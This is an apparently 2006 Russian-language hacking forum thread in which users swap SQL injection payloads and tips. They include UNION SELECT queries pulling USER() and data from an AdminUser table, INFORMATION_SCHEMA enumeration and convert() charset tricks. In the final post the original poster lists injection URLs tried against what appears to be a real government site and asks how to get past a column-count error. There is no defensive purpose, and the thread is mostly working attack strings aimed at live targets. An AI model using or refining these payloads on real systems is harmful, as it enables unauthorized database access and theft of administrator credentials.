[ sql inj need help ]

Discussion in 'Песочница' started by guest3297, 12 Aug 2006.

  1. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    сабж.
    постить токо по теме нужен пример запроса к базе...

    test.php?id=-1+union+select+1,2,3,4,USER(),6,7,8,9/*

     
  2. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    http://zaco.cup.su/?file=view&news_id=15

    юзай моск, поиск и convert()
     
  3. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    только тут придется использовать convert(user() using latin1) cp1251 просто чаще встречается
     
  4. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    ZaCo стукни пожалуста 170501.
    Раньше занимался исключительно mysql к mssql привыкаю еще не все знаю.
    Хотелось бы поговорить...

    вот еще

    index.cfm?topicID=17%20UNION%20SELECT%20TOP%201%20user%20FROM%20AdminUser--

    index.cfm?topicID=17%20UNION%20SELECT%20TOP%201%20random%20FROM%20AdminUser--

    Собственно еще вопрос елси верно нет вывода данных?
     
  5. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    Invalid column name

    попробуй

    INFORMATION_SCHEMA.TABLES
    INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=
     
  6. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    2limpompo
    ты не посмотрел это прмер все таблицы и поля известны перечитай вопрос почему не выводит если все правильно?
     
  7. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Вот наткнулся на сайтик не как не могу понять что делаю не так sql точно есть но вот составить не как не могу вот краткий список моих действий.

    _http://site.gov/index.asp?cat=6" or 1=1--
    _http://site.gov/index.asp?cat=6' or 1=1--
    Исполняетьбся ез ошибок Принимает значение "6".
    _http://site.gov/index.asp?cat=6 or 1=1--

    Такой запрос не сьедает. Ругаеться на кол - во строк.
    _http://site.gov/index.asp?cat=6 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

    Попытка прервать запрос не удаеться.
    как с одинарной так и с 2 кавычкой.
    _http://site.gov/index.asp?cat=6'; UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--


    Ну собственно хотелось бы узнать как составить запрос на выполнение кто может помогите.

    Особенно интересует эта ошибка как ее обойти.
    Понятно что количество строк не совпадает...